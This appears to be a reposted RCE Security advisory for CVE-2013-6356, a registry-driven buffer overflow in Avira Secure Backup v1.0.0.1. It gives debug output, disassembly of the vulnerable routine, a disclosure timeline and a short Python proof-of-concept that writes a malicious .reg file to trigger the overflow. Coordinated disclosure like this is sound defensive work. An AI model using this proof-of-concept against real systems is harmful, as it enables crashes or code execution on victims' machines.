扫码分享
验证:
体验盒子RCE Security Advisory
http://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product:Avira Secure Backup
Vendor URL: www.avira.com
Type: Improper Restriction of Operations within the Bounds of
a Memory Buffer [CWE-119]
Date found: 2013-10-30
Date published: 2013-11-16
CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:CVE-2013-6356
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
Avira Secure Backup v1.0.0.1 Build 3616
4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Avira Secure
Backup v1.0.0.1 Build 3616.
The application loads the values of the Registry Keys
"AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from
"HKEY_CURRENT_USER\Software\Avira Secure Backup" on startup but does not
properly validate the length of the fetched values before using them in
the further application context, which leads to a buffer overflow
condition with possible persistent code execution.
The application queries the values via a RegQueryValueExW call and a
fixed buffer pointer (lpData) and a fixed buffer size pointer
(lpcbData). If the input string size is greater than the predefined
size, the application uses a second RegQueryValueExW call with the new
buffer size set to the length of the input string, but reuses the
original buffer pointer (lpData), which has not been resized. This
results in overwriting memory space inlcuding SEH - records.
An attacker needs to force the victim to import an arbitrary .reg file
in order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in a
denial-of-service condition. The attack scenario is persistent, because
the code is executed as long as the manipulated values are loaded into
the Registry.
5. DEBUG INFORMATION
--------------------
Call stack of main thread
AddressReturns to Procedure / arguments Called
from
0012EB48 77DA6F87 <JMP.&ntdll.memmove>ADVAPI32.77DA6F82
0012EB4C 0012ECBC dest = 0012ECBC
0012EB50 0015760C src = 0015760C
0012EB54 00002712 n = 2712 (10002.)
0012EC28 77DA708B ADVAPI32.77DA6E02 ADVAPI32.77DA7086
0012EC60 0043F15D Includes ADVAPI32.77DA708BAvira_Se.0043F15B
0012EC9C 0043F3F8 Avira_Se.0043F0D2 Avira_Se.0043F3F3
0012F5B4 00CC00CC *** CORRUPT ENTRY ***
The vulnerable code part of Avira Secure Backup.exe:
0043F0D2PUSH EBP
0043F0D3MOV EBP,ESP
0043F0D5SUB ESP,10
0043F0D8PUSH EBX
0043F0D9PUSH ESI
0043F0DAMOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>;
ADVAPI32.RegOpenKeyExW
0043F0E0PUSH EDI
0043F0E1LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4PUSH EAX ; /pHandle
0043F0E5PUSH 20019 ; |Access
0043F0EAXOR EBX,EBX; |
0043F0ECPUSH EBX ; |Reserved => 0
0043F0EDPUSH DWORD PTR SS:[EBP+C]; |Subkey
0043F0F0MOV BYTE PTR SS:[EBP-1],BL ; |
0043F0F3PUSH DWORD PTR SS:[EBP+8]; |hKey
0043F0F6MOV DWORD PTR SS:[EBP-C],820 ; |
0043F0FDCALL ESI ; \RegOpenKeyExW
0043F0FFMOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>;
ADVAPI32.RegQueryValueExW
0043F105TEST EAX,EAX
0043F107JNZ SHORT Avira_Se.0043F133
0043F109LEA EAX,DWORD PTR SS:[EBP-C]
0043F10CPUSH EAX ; /pBufSize
0043F10DPUSH DWORD PTR SS:[EBP+14] ; |Buffer
0043F110LEA EAX,DWORD PTR SS:[EBP-10]; |
0043F113PUSH EAX ; |pValueType
0043F114PUSH EBX ; |Reserved => NULL
0043F115PUSH DWORD PTR SS:[EBP+10] ; |ValueName
0043F118PUSH DWORD PTR SS:[EBP-8]; |hKey
0043F11BCALL EDI ; \RegQueryValueExW
0043F11DTEST EAX,EAX
0043F11FJNZ SHORT Avira_Se.0043F125
0043F121MOV BYTE PTR SS:[EBP-1],1
0043F125PUSH DWORD PTR SS:[EBP-8]; /hKey
0043F128CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F12ECMP BYTE PTR SS:[EBP-1],BL
0043F131JNZ SHORT Avira_Se.0043F16E
0043F133LEA EAX,DWORD PTR SS:[EBP-8]
0043F136PUSH EAX
0043F137PUSH 20119
0043F13CPUSH EBX
0043F13DPUSH DWORD PTR SS:[EBP+C]
0043F140PUSH DWORD PTR SS:[EBP+8]
0043F143CALL ESI
0043F145TEST EAX,EAX
0043F147JNZ SHORT Avira_Se.0043F16E
0043F149LEA EAX,DWORD PTR SS:[EBP-C]
0043F14CPUSH EAX
0043F14DPUSH DWORD PTR SS:[EBP+14]
0043F150LEA EAX,DWORD PTR SS:[EBP-10]
0043F153PUSH EAX
0043F154PUSH EBX
0043F155PUSH DWORD PTR SS:[EBP+10]
0043F158PUSH DWORD PTR SS:[EBP-8]
0043F15BCALL EDI
0043F15DTEST EAX,EAX
0043F15FJNZ SHORT Avira_Se.0043F165
0043F161MOV BYTE PTR SS:[EBP-1],1
0043F165PUSH DWORD PTR SS:[EBP-8]; /hKey
0043F168CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F16EXOR EAX,EAX
0043F170CMP BYTE PTR SS:[EBP-1],BL
0043F173POP EDI
0043F174POP ESI
0043F175SETNE AL
0043F178POP EBX
0043F179LEAVE
0043F17ARETN
6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:
#!/usr/bin/python
file="poc.reg"
junk1="\xCC" * 1240
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n"
poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
7. SOLUTION
-----------
Update to v1.0.0.2 Build 3630 or later
8. REPORT TIMELINE
------------------
2013-10-30: Discovery of the vulnerability
2013-11-03: RCE Security sends first notification to vendor via mail
with disclosure date set to 18. November 2013
2013-11-03: MITRE assigns CVE-2013-6356 for this issue
2013-11-04: Vendor ACKs the vulnerability
2013-11-10: RCE Security asks for a status
2013-11-11: Vendor expects to receive a fix the same day
2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
2013-11-16: Coordinated Disclosure
9. REFERENCES
-------------
http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/
体验盒子
